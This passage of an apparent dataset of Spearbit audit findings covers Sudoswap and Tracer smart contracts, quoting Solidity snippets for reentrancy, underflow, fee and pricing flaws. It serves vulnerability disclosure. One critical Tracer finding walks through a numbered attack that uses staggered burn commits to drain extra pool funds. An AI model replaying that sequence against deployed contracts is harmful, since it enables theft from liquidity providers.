// Transfer initial `NFT`s from `sender` to `pair` for (uint256 i = 0; i < _initialNFTIDs.length; i++) { // Only relevant for PoolType.NFT or PoolType.TRADE _nft.safeTransferFrom(msg.sender,address(_pair),_initialNFTIDs[i]); } } function _initializePairERC20(...) ... { ... // Transfer initial tokens to pair // Only relevant for PoolType.TOKEN or PoolType.TRADE _token.safeTransferFrom(msg.sender,address(_pair),_initialTokenBalance); ... // Transfer initial NFTs from sender to pair for (uint256 i = 0; i < _initialNFTIDs.length; i++) { // Only relevant for PoolType.NFT or PoolType.TRADE _nft.safeTransferFrom(msg.sender,address(_pair),_initialNFTIDs[i]); } }", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Low Risk" + ] + }, + { + "title": "Check for 0 parameters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "Functions setCallAllowed() and setBondingCurveAllowed() do not check that target != 0 while the comparable function setRouterAllowed() does check for _router != 0. function setCallAllowed(address payable target, bool isAllowed) external onlyOwner { ... // No check on target callAllowed[target] = isAllowed; } function setBondingCurveAllowed(ICurve bondingCurve, bool isAllowed) external onlyOwner { ... // No check on bondingCurve bondingCurveAllowed[bondingCurve] = isAllowed; } function setRouterAllowed(LSSVMRouter _router, bool isAllowed) external onlyOwner { require(address(_router) != address(0), \"0 router address\"); ... routerAllowed[_router] = isAllowed; }", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Low Risk" + ] + }, + { + "title": "Potentially undetected underflow in assembly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "Functions factory(), bondingCurve(), nft(), poolType(), and token() have an assembly based calculation where the paramsLength is subtracted from calldatasize(). In assembly, underflow checks are disregarded, and if too few parameters are supplied in calls to the functions in the LSSVMPair contract, this calculation may underflow, causing the values for factory(), bondingCurve(), nft(), poolType(), and token() to be read from unexpected pieces of memory. This memory will usually be zeroed, therefore execution will stop at some point. However, it is safer to prevent this from ever happening. function factory() public pure returns (LSSVMPairFactoryLike _factory) { ... assembly {_factory := shr(0x60,calldataload(sub(calldatasize(), paramsLength)))} } function bondingCurve() public pure returns (ICurve _bondingCurve) { ... assembly {_bondingCurve := shr(0x60,calldataload(add(sub(calldatasize(), paramsLength), 20)))} } function nft() public pure returns (IERC721 _nft) { ... assembly {_nft := shr(0x60,calldataload(add(sub(calldatasize(), paramsLength), 40)))} } function poolType() public pure returns (PoolType _poolType) { ... assembly {_poolType := shr(0xf8,calldataload(add(sub(calldatasize(), paramsLength), 60)))} } function token() public pure returns (ERC20 _token) { ... assembly {_token := shr(0x60,calldataload(add(sub(calldatasize(), paramsLength), 61)))} 
}", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Low Risk" + ] + }, + { + "title": "Check number of NFTs is not 0", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "Functions swapNFTsForToken(), routerSwapNFTsForToken(), and getSellNFTQuote() in LSSVMPair.sol do not perform input verication on the number of NFTs. If _bondingCurve.getSellInfo() accidentally happens to re- turn a non-zero value, then an unfair amount of tokens will be given back to the caller. The current two versions of bondingCurve do return 0, but a future version might accidentally return non-zero. Note: 1. getSellInfo() is supposed to return an error when numNFTs == 0, but this does not always happen. This error code is not always checked. function swapNFTsForToken(uint256[] calldata nftIds, ...) external virtual ,! ,! returns (uint256 outputAmount) { ... // No check on `nftIds.length` (error, newSpotPrice, outputAmount, protocolFee) = nftIds.length,..); _bondingCurve.getSellInfo(..., ... } function routerSwapNFTsForToken(address payable tokenRecipient) ... { ,! ... uint256 numNFTs = _nft.balanceOf(getAssetRecipient()) - _assetRecipientNFTBalanceAtTransferStart; ... // No check that `numNFTs > 0` (error, newSpotPrice, outputAmount, protocolFee) = _bondingCurve.getSellInfo(..., numNFTs, ...); ,! } function getSellNFTQuote(uint256 numNFTs) ... { ... // No check that `numNFTs > 0` (error, newSpotPrice, outputAmount, protocolFee) = bondingCurve().getSellInfo(..., numNFTs,...); ... ,! } 2. For comparison, the function swapTokenForSpecificNFTs() does perform an entry check on the number of requested NFTs. 23 function swapTokenForSpecificNFTs(uint256[] calldata nftIds,...) ... { ... //There is a check on the number of requested `NFT`s require( (nftIds.length > 0) && (nftIds.length <= _nft.balanceOf(address(this))), \"Must ask for > 0 and < balanceOf NFTs\"); // check is present ... ,! ,! }", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Low Risk 22" + ] + }, + { + "title": "Avoid utilizing inside knowledge of functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "ETH based swap functions use isRouter==false and router- Caller==address(0) as parameters to swapTokenForAnyNFTs() and swapToken- ForSpecificNFTs(). These parameters end up in _validateTokenInput(). The LSSVMPairETH version of this function does not use those parameters, so it is not a problem at this point. However, the call actually originates from the Router so functionally isRouter should be true. Our concern is that using inside knowledge of the functions might potentially introduce subtle issues in the following scenarios: 24 function robustSwapETHForAnyNFTs(...) ... { ... remainingValue -= swapList[i].pair.swapTokenForAnyNFTs{value: pairCost}(swapList[i].numItems, nftRecipient, false, address(0)); ... ,! } function robustSwapETHForSpecificNFTs(...) ... { ... remainingValue -= swapList[i].pair.swapTokenForSpecificNFTs{value: pairCost}(swapList[i].nftIds, nftRecipient, false, address(0)); ... ,! } function _swapETHForAnyNFTs(...) ... { ... remainingValue -= swapList[i].pair.swapTokenForAnyNFTs{value: pairCost}(swapList[i].numItems, nftRecipient, false, address(0)); ... ,! } function _swapETHForSpecificNFTs(...) ... { ... remainingValue -= swapList[i].pair.swapTokenForSpecificNFTs{value: ,! pairCost}(swapList[i].nftIds, nftRecipient, false, address(0)); ... 
} function swapTokenForAnyNFTs(..., bool isRouter, address routerCaller) ... { ... _validateTokenInput(inputAmount, isRouter, routerCaller, _factory); ... } function swapTokenForSpecificNFTs(..., bool isRouter, address routerCaller) ... { ... _validateTokenInput(inputAmount, isRouter, routerCaller, _factory); ... } abstract contract LSSVMPairETH is LSSVMPair { function _validateTokenInput(..., bool /*isRouter*/, address /*routerCaller*/, ...) { ... // doesn't use isRouter and routerCaller } }", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Low Risk" + ] + }, + { + "title": "Add Reentrancy Guards", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "The abovementioned permalinks and corresponding functions are listed for Sudoswap's consideration to introduce reentrancy guard modifiers. Currently, there is only one function that uses a reentrancy guard modifier: withdrawAllETH() in LSSVMPairETH.sol#L94. Other functions in the codebase may also require reentrancy guard modifiers. We have only seen reentrancy problems when malicious routers, assetRecipients, curves, factory owner or protocolFeeRecipient are involved. Despite normal prohibitions on this occurrence, it is better to protect one's codebase than regret leaving open vulnerabilities available for potential attackers. There are three categories of functions that Sudoswap should consider applying reentrancy guard modifiers to: functions withdrawing ETH, functions sending ETH, and uses of safeTransferFrom() to external addresses (which will trigger an onERC1155Received() callback to receiving contracts). Examples of functions withdrawing ETH within LSSVM: LSSVMPairFactory.sol#L272 LSSVMPairETH.sol#L104 Instances of functions sending ETH within LSSVM: LSSVMPairETH.sol#L34 LSSVMPairETH.sol#L46 A couple of instances that use safeTransferFrom() to call external addresses, which will trigger an onERC1155Received() callback to receiving contracts: LSSVMPairFactory.sol#L428 LSSVMRouter.sol#L544", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Low Risk" + ] + }, + { + "title": "Saving 1 byte off the constructor() code", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "The dup2 before the return in the code below indicates a possible optimization by rearranging the stack. function cloneETHPair(...) ... { assembly { ... // 3d | RETURNDATASIZE | 0 // 60 runtime (r) | PUSH1 runtime | r 0 // 80 | DUP1 | r r 0 // 60 creation (c) | PUSH1 creation | c r r 0 // 3d | RETURNDATASIZE | 0 c r r 0 // 39 | CODECOPY | r 0 [0-2d]: runtime code // 81 | DUP2 | 0 r 0 [0-2d]: runtime code // f3 | RETURN | 0 [0-2d]: runtime code ... 
} }", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Gas Optimization" + ] + }, + { + "title": "Decode extradata in calldata in one go", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "Spearbit discovered that the functions factory(), bondingCurve() and nft() are called independently but in most use cases all of the data is required.", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Gas Optimization" + ] + }, + { + "title": "Transfer last NFT instead of first", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "When executing _sendAnyNFTsToRecipient() NFTs are retrieved by taking the first available NFT and then sending it to nftRecipient. In (most) ERC721 implementations as well as in the EnumerableSet implementation, the array that stores the ownership is updated by swapping the last element with the selected element, to be able to shrink the array afterwards. When you always transfer the last NFT instead of the first NFT, swapping isn't necessary so gas is saved. Code related to LSSVMPairEnumerable.sol: abstract contract LSSVMPairEnumerable is LSSVMPair { function _sendAnyNFTsToRecipient(IERC721 _nft, address nftRecipient, uint256 numNFTs) internal override { ... for (uint256 i = 0; i < numNFTs; i++) { uint256 nftId = IERC721Enumerable(address(_nft)).tokenOfOwnerByIndex(address(this), 0); // take the first NFT _nft.safeTransferFrom(address(this), nftRecipient, nftId); // this calls _beforeTokenTransfer of ERC721Enumerable } } } abstract contract ERC721Enumerable is ERC721, IERC721Enumerable { function _beforeTokenTransfer(address from, address to, uint256 tokenId) internal virtual override { ... _removeTokenFromOwnerEnumeration(from, tokenId); ... } function _removeTokenFromOwnerEnumeration(address from, uint256 tokenId) private { ... uint256 lastTokenIndex = ERC721.balanceOf(from) - 1; uint256 tokenIndex = _ownedTokensIndex[tokenId]; // When the token to delete is the last token, the swap operation is unnecessary ==> we can make use of this if (tokenIndex != lastTokenIndex) { uint256 lastTokenId = _ownedTokens[from][lastTokenIndex]; _ownedTokens[from][tokenIndex] = lastTokenId; // Move the last token to the slot of the to-delete token _ownedTokensIndex[lastTokenId] = tokenIndex; // Update the moved token's index } // This also deletes the contents at the last position of the array delete _ownedTokensIndex[tokenId]; delete _ownedTokens[from][lastTokenIndex]; } } Code related to LSSVMPairMissingEnumerable.sol: abstract contract LSSVMPairMissingEnumerable is LSSVMPair { function _sendAnyNFTsToRecipient(IERC721 _nft, address nftRecipient, uint256 numNFTs) internal override { ... for (uint256 i = 0; i < numNFTs; i++) { uint256 nftId = idSet.at(0); // take the first NFT _nft.safeTransferFrom(address(this), nftRecipient, nftId); idSet.remove(nftId); // finally calls _remove() } } } library EnumerableSet { function _remove(Set storage set, bytes32 value) private returns (bool) { ... 
uint256 toDeleteIndex = valueIndex - 1; uint256 lastIndex = set._values.length - 1; if (lastIndex != toDeleteIndex) { // ==> we can make use of this bytes32 lastvalue = set._values[lastIndex]; set._values[toDeleteIndex] = lastvalue; // Move the last value to the index where the value to delete is set._indexes[lastvalue] = valueIndex; // Replace lastvalue's index to valueIndex } set._values.pop(); // Delete the slot where the moved value was stored delete set._indexes[value]; // Delete the index for the deleted slot ... } }", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Gas Optimization" + ] + }, + { + "title": "Simplify the connection between Pair and Router", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "There are two ways to interact between Pair and Router: 1. LSSVMPairERC20.sol calls router.pairTransferERC20From, where the goal is to transfer ERC20. 2. _swapNFTsForToken calls pair.cacheAssetRecipientNFTBalance and pair.routerSwapNFTsForToken, where the goal is to transfer NFTs. Using two different patterns to solve the same problem makes the code more complex and larger than necessary. Patterns with cacheAssetRecipientNFTBalance() are also error prone. abstract contract LSSVMPairERC20 is LSSVMPair { function _validateTokenInput(..., bool isRouter, ...) ... { ... if (isRouter) { LSSVMRouter router = LSSVMRouter(payable(msg.sender)); // Verify if router is allowed require(_factory.routerAllowed(router), \"Not router\"); ... router.pairTransferERC20From( _token, routerCaller, _assetRecipient, inputAmount, pairVariant() ); ... } ... } } contract LSSVMRouter { function pairTransferERC20From(...) ... { // verify caller is a trusted pair contract require(factory.isPair(msg.sender, variant), \"Not pair\"); ... // transfer tokens to pair token.safeTransferFrom(from, to, amount); // transfer ERC20 from the original caller } } contract LSSVMRouter { function _swapNFTsForToken(...) ... { ... // Cache current asset recipient balance swapList[i].pair.cacheAssetRecipientNFTBalance(); ... for (uint256 j = 0; j < swapList[i].nftIds.length; j++) { nft.safeTransferFrom(msg.sender,assetRecipient,swapList[i].nftIds[j]); // transfer NFTs from the original caller } ... outputAmount += swapList[i].pair.routerSwapNFTsForToken(tokenRecipient); ... } } abstract contract LSSVMPair is Ownable, ReentrancyGuard { function cacheAssetRecipientNFTBalance() external { require(factory().routerAllowed(LSSVMRouter(payable(msg.sender))),\"Not router\"); // Verify if router is allowed assetRecipientNFTBalanceAtTransferStart = nft().balanceOf(getAssetRecipient()) + 2; } }", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Gas Optimization" + ] + }, + { + "title": "Cache array length", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "An array length is frequently used in for loops. This value is re-evaluated on every iteration of the loop. Assuming the arrays are regularly larger than 1, it saves some gas to store the array length in a temporary variable. The following snippets are samples of the above context for lines of code where this is relevant: LSSVMPairEnumerable.sol#L51 LSSVMPairFactory.sol#L378 LSSVMPairMissingEnumerable.sol#L57 LSSVMRouter.sol#L358 For more examples, please see the context above for exact lines where this applies. 
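The pattern is simply caching the length once; a sketch:

pragma solidity ^0.8.0;

import {IERC721} from "@openzeppelin/contracts/token/ERC721/IERC721.sol";

contract CachedLengthSketch {
    // Cache the length once instead of re-evaluating it on every iteration
    // (the saving is largest for storage arrays).
    function transferAll(IERC721 nft, address assetRecipient, uint256[] calldata nftIds) external {
        uint256 numIds = nftIds.length; // cached once
        for (uint256 i = 0; i < numIds; i++) {
            nft.safeTransferFrom(msg.sender, assetRecipient, nftIds[i]);
        }
    }
}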
The following contains examples of the overuse of nftIds.length: function swapTokenForSpecificNFTs(...) ... { ... require((nftIds.length > 0) && (nftIds.length <= _nft.balanceOf(address(this))),\"Must ask for > 0 and < balanceOf NFTs\"); ... (error, newSpotPrice, inputAmount, protocolFee) = _bondingCurve .getBuyInfo( spotPrice, delta, nftIds.length, fee, _factory.protocolFeeMultiplier() ); ... }", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Gas Optimization" + ] + }, + { + "title": "Use Custom Errors", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "Strings are used to encode error messages. With the current Solidity versions it is possible to replace them with custom errors, which are more gas efficient. Example of non-custom errors used in LSSVM: LSSVMRouter.sol#L604 require(block.timestamp <= deadline, \"Deadline passed\"); LSSVMRouter.sol#L788 require(outputAmount >= minOutput, \"outputAmount too low\"); Note: This pattern has been used in Ownable.sol#L6-L7", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Gas Optimization" + ] + }, + { + "title": "Alternatives for the immutable Proxy variables", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "In the current LSSVMPairClone, the immutable variables stored in the proxy are sent along with every call. It may be possible to optimize this.", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Gas Optimization" + ] + }, + { + "title": "Pair implementations may not be Proxies", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "The security of function pairTransferERC20From() relies on isPair(). In turn, isPair() relies on both isETHPairClone() and isERC20PairClone(). These functions check that a valid proxy is used with a valid implementation address. However, if the implementation address itself is a proxy it could link to any other contract. In this case security could be undermined depending on the implementation details. This is not how the protocol is designed, but future developers or developers using a fork of the code might not be aware of this.", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Informational" + ] + }, + { + "title": "NFT and Token Pools can be signed orders instead", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "Currently if any actor wants to create a buy/sell order they would have to create a new pool and pay gas for it. However, the advantage of this is unclear. TOKEN and NFT type pools can really be buy/sell orders at a price curve using signed data. This is reminiscent of how similar limit orders implemented by OpenSea, 1Inch, and SushiSwap currently function. Amending this in the codebase would make creating buy/sell orders free and should attract more liquidity and/or orders to Sudoswap.", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Informational" + ] + }, + { + "title": "Remove Code Duplication", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "Functions like swapTokenForAnyNFTs and swapTokenForSpecificNFTs are nearly identical and can be deduplicated by creating a common internal function. 
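A sketch of the deduplication, with a hypothetical shared helper _swap; the real bodies would carry the pricing and transfer logic:

pragma solidity ^0.8.0;

contract DedupSketch {
    function swapTokenForAnyNFTs(uint256 numNFTs, address nftRecipient) external payable returns (uint256) {
        return _swap(numNFTs, nftRecipient, new uint256[](0)); // "any": no specific ids
    }

    function swapTokenForSpecificNFTs(uint256[] calldata nftIds, address nftRecipient) external payable returns (uint256) {
        return _swap(nftIds.length, nftRecipient, nftIds);
    }

    // Hypothetical common internal function holding the previously duplicated body.
    function _swap(uint256 numNFTs, address nftRecipient, uint256[] memory nftIds) internal returns (uint256 inputAmount) {
        // ... shared validation, pricing and transfer logic (elided) ...
        nftRecipient; nftIds; // silence unused-variable warnings in this sketch
        return numNFTs;
    }
}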
On the other hand this will slightly increase gas usage due to an extra jump.", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Informational" + ] + }, + { + "title": "Unclear Function Name", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "The functions _validateTokenInput() of both LSSVMPairETH and LSSVMPairERC20 do not only validate the token input but also transfer ETH/ERC20. The function name does not reasonably imply this and therefore can create some confusion. abstract contract LSSVMPairETH is LSSVMPair { function _validateTokenInput(...) ... { ... _assetRecipient.safeTransferETH(inputAmount); ... } } abstract contract LSSVMPairERC20 is LSSVMPair { function _validateTokenInput(...) ... { ... if (isRouter) { ... router.pairTransferERC20From(...); // transfer of tokens ... } else { // Transfer tokens directly _token.safeTransferFrom(msg.sender, _assetRecipient, inputAmount); } } }", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Informational" + ] + }, + { + "title": "Inaccurate Message About MAX_FEE", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "The function initialize() of LSSVMPair has an error message containing less than 100%. This is likely an error and should probably be less than 90%, as in the changeFee() function and because MAX_FEE == 90%. // 90%, must <= 1 - MAX_PROTOCOL_FEE (set in LSSVMPairFactory) uint256 internal constant MAX_FEE = 9e17; function initialize(..., uint256 _fee, ...) external payable { ... require(_fee < MAX_FEE, \"Trade fee must be less than 100%\"); // 100% should be 90% ... } function changeFee(uint256 newFee) external onlyOwner { ... require(newFee < MAX_FEE, \"Trade fee must be less than 90%\"); ... }", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Informational" + ] + }, + { + "title": "Inaccurate comment for assetRecipientNFTBalanceAtTransferStart", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "The comment in LSSVMPair notes that assetRecipientNFTBalanceAtTransferStart is 0; however, in routerSwapNFTsForToken() the variable assetRecipientNFTBalanceAtTransferStart is set to 1. As such, the below comment is probably inaccurate. // Temporarily used during LSSVMRouter::_swapNFTsForToken to store the number of NFTs transferred // directly to the pair. Should be 0 outside of the execution of routerSwapAnyNFTsForToken. uint256 internal `assetRecipientNFTBalanceAtTransferStart`; function routerSwapNFTsForToken(address payable tokenRecipient) ... { ... assetRecipientNFTBalanceAtTransferStart = 1; ... }", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Informational" + ] + }, + { + "title": "IERC1155 not utilized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "The contract LSSVMPair references IERC1155, but does not utilize the interface within LSSVMPair.sol. import {IERC1155} from \"@openzeppelin/contracts/token/ERC1155/IERC1155.sol\"; The struct TokenToTokenTrade is defined in LSSVMRouter, but the contract does not use it either. 
struct TokenToTokenTrade { PairSwapSpecific[] tokenToNFTTrades; PairSwapSpecific[] nftToTokenTrades; } It is better to remove unused code due to potential confusion.", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Informational" + ] + }, + { + "title": "Use Fractions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "On some occasions percentages are indicated in a number format ending in e17. It is also possible to use fractions of e18. Considering e18 is the standard base format, using fractions might be easier to read. LSSVMPairFactory.sol#L28 LSSVMPair.sol#L25", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Informational" + ] + }, + { + "title": "Two families of token libraries used", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Sudoswap-Spearbit-Security-Review.pdf", + "body": "The Sudoswap contract imports token libraries from both OpenZeppelin and Solmate. If Sudoswap sticks within one library family, then it will not be necessary to track potential issues from two separate families of libraries.", + "labels": [ + "Spearbit", + "Sudoswap", + "Severity: Informational" + ] + }, + { + "title": "Pool token price is incorrect when there is more than one pending upkeep", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The amount of pool tokens to mint and quote tokens to burn is determined by the pool token price. This price, for a commit at update interval ID X, should not be influenced by any pending commits for IDs greater than X. However, in the current implementation the price includes the current total supply, but burn commits burn pool tokens immediately when commit() is called, not when upkeep() is executed. // pool token price computation at execution of updateIntervalId, example for long price priceHistory[updateIntervalId].longPrice = longBalance / (IERC20(tokens[LONG_INDEX]).totalSupply() + _totalCommit[updateIntervalId].longBurnAmount + _totalCommit[updateIntervalId].longBurnShortMintAmount) The implementation tries to fix this by adding back all tokens burned at this updateIntervalId but it must also add back all tokens that were burned in future commits (i.e. when ID > updateIntervalID). This issue allows an attacker to get a better pool token price and steal pool token funds. Example: Given the preconditions: long.totalSupply() = 2000 User owns 1000 long pool tokens lastPriceTimestamp = 100 updateInterval = 10 frontRunningInterval = 5 At time 104: User commits to BurnLong 500 tokens in appropriateUpdateIntervalId = 5. Upon execution the user receives a long price of longBalance / (1500 + 500) if no further future commitments are made. Then, as tokens are burned, totalPoolCommitments[5].longBurnAmount = 500 and long.totalSupply -= 500. At time 106: The user commits another 500 tokens to BurnLong at appropriateUpdateIntervalId = 6, as they are now past the frontRunningInterval and are scheduled for the next update. Then totalPoolCommitments[6].longBurnAmount = 500 and long.totalSupply -= 500 again as tokens are burned. Finally, the 5th update interval ID is executed by the pool keeper, but at longPrice = longBalance / (IERC20(tokens[LONG_INDEX]).totalSupply() + _totalCommit[5].longBurnAmount + _totalCommit[5].longBurnShortMintAmount) = longBalance / (1000 + 500), which is a better price than what the user should have received. 
With a longBalance of 2000, the user receives 500 * (2000 / 1500) = 666.67 tokens executing the first burn commit and 500 * ((2000 - 666.67) / 1500) = 444.43 tokens executing the second one. The total pool balance received by the user is 1111.1/2000 = 55.555% by burning only 1000 / 2000 = 50% of the pool token supply.", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Critical" + ] + }, + { + "title": "No price scaling in SMAOracle", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The update() function of the SMAOracle contract doesn't scale the latestPrice although a scaler is set in the constructor. On the other hand, the _latestRoundData() function of the ChainlinkOracleWrapper contract does scale via toWad(). contract SMAOracle is IOracleWrapper { constructor(..., uint256 _spotDecimals, ...) { ... require(_spotDecimals <= MAX_DECIMALS, \"SMA: Decimal precision too high\"); ... /* `scaler` is always <= 10^18 and >= 1 so this cast is safe */ scaler = int256(10**(MAX_DECIMALS - _spotDecimals)); ... } function update() internal returns (int256) { /* query the underlying spot price oracle */ IOracleWrapper spotOracle = IOracleWrapper(oracle); int256 latestPrice = spotOracle.getPrice(); ... priceObserver.add(latestPrice); // doesn't scale latestPrice ... } contract ChainlinkOracleWrapper is IOracleWrapper { function getPrice() external view override returns (int256) { (int256 _price, ) = _latestRoundData(); return _price; } function _latestRoundData() internal view returns (int256, uint80) { (..., int256 price, ..) = AggregatorV2V3Interface(oracle).latestRoundData(); ... return (toWad(price), ...); }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: High Risk" + ] + }, + { + "title": "Two different invariantCheck variables used in PoolFactory.deployPool()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The deployPool() function in the PoolFactory contract uses two different invariantCheck variables: the one defined as a contract's instance variable and the one supplied as a parameter. Note: This was also documented in Secureum's CARE-X report issue \"Invariant check incorrectly fixed\". function deployPool(PoolDeployment calldata deploymentParameters) external override returns (address) { ... poolCommitter.initialize(..., deploymentParameters.invariantCheck, ...); // version 1 of invariantCheck ... ILeveragedPool.Initialization memory initialization = ILeveragedPool.Initialization({ ... _invariantCheckContract: invariantCheck, // version 2 of invariantCheck ... });", + "labels": [ + "Spearbit", + "Tracer", + "Severity: High Risk" + ] + }, + { + "title": "Duplicate user payments for long commits when paid from balance", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "When minting pool tokens in commit(), the fromAggregateBalance parameter indicates if the user wants to pay from their internal balances or by transferring the tokens. 
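The shape of the corrected condition, sketched with the finding's names: tokens should only be pulled when the user is not paying from their aggregate balance. Everything below, including the enum ordering, is assumed for illustration:

pragma solidity ^0.8.0;

import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {SafeERC20} from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";

contract CommitPaymentSketch {
    using SafeERC20 for IERC20;

    enum CommitType { ShortMint, ShortBurn, LongMint, LongBurn } // assumed ordering

    IERC20 public quoteToken;
    address public leveragedPool;

    // Pull tokens only when the user is NOT paying from their internal (aggregate) balance.
    function _payForLongMint(CommitType commitType, bool fromAggregateBalance, uint256 amount) internal {
        if (commitType == CommitType.LongMint && !fromAggregateBalance) {
            quoteToken.safeTransferFrom(msg.sender, leveragedPool, amount);
        }
        // when fromAggregateBalance is true, the amount is deducted from the stored balance instead
    }
}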
The second if condition is wrong and leads to users having to pay twice when calling commit() with CommitType.LongMint and fromAggregateBalance = true.", + "labels": [ + "Spearbit", + "Tracer", + "Severity: High Risk" + ] + }, + { + "title": "Initial executionPrice is too high", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "When a pool is deployed the initial executionPrice is calculated as firstPrice * 1e18 where firstPrice is ILeveragedPool(_poolAddress).getOraclePrice(): contract PoolKeeper is IPoolKeeper, Ownable { function newPool(address _poolAddress) external override onlyFactory { int256 firstPrice = ILeveragedPool(_poolAddress).getOraclePrice(); int256 startingPrice = ABDKMathQuad.toInt(ABDKMathQuad.mul(ABDKMathQuad.fromInt(firstPrice), FIXED_POINT)); executionPrice[_poolAddress] = startingPrice; } } All other updates to executionPrice use the result of getPriceAndMetadata() directly without scaling: function performUpkeepSinglePool() { ... (int256 latestPrice, ...) = pool.getUpkeepInformation(); ... executionPrice[_pool] = latestPrice; ... } contract LeveragedPool is ILeveragedPool, Initializable, IPausable { function getUpkeepInformation() { (int256 _latestPrice, ...) = IOracleWrapper(oracleWrapper).getPriceAndMetadata(); return (_latestPrice, ...); } } The price after the firstPrice will always be lower; therefore, the funding rate payment will always go to the shorts, and long pool token holders will incur a loss.", + "labels": [ + "Spearbit", + "Tracer", + "Severity: High Risk" + ] + }, + { + "title": "Paused state can't be set and therefore withdrawQuote() can't be executed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "The checkInvariants() function of the InvariantCheck contract is called via the modifiers checkInvariantsBeforeFunction() and checkInvariantsAfterFunction() of both LeveragedPool and PoolCommitter contracts, and it is meant to pause the contracts if the invariant checks don't hold. The aforementioned modifiers also contain the require(!paused, \"Pool is paused\"); statement, which reverts the entire transaction and resets the paused variable that was just set. Furthermore, the paused state can only be set by the InvariantCheck contract due to the onlyInvariantCheckContract modifier. Thus the paused variable will never be set to true, making it impossible to execute withdrawQuote() because it requires the contract to be paused. This means that the quote tokens will always stay in the pool even if invariants don't hold and all other actions are blocked. Relevant parts of the code: The checkInvariants() function calls InvariantCheck.pause() if the invariants don't hold. The latter calls pause() in LeveragedPool and PoolCommitter: contract InvariantCheck is IInvariantCheck { function checkInvariants(address poolToCheck) external override { ... pause(IPausable(poolToCheck), IPausable(address(poolCommitter))); ... } function pause(IPausable pool, IPausable poolCommitter) internal { pool.pause(); poolCommitter.pause(); } } In LeveragedPool and PoolCommitter contracts, the checkInvariantsBeforeFunction() and checkInvariantsAfterFunction() modifiers will make the transaction revert if checkInvariants() sets the paused state. 
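One way out, sketched below, not the team's actual fix: drop the trailing require so the paused flag set inside checkInvariants() survives the call. A fragment, assuming the quoted contract's context:

modifier checkInvariantsAfterFunction() {
    require(!paused, "Pool is paused");
    _;
    invariantCheck.checkInvariants(leveragedPool);
    // deliberately no require(!paused) here: reverting now would also roll
    // back the paused = true that checkInvariants() just set
}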
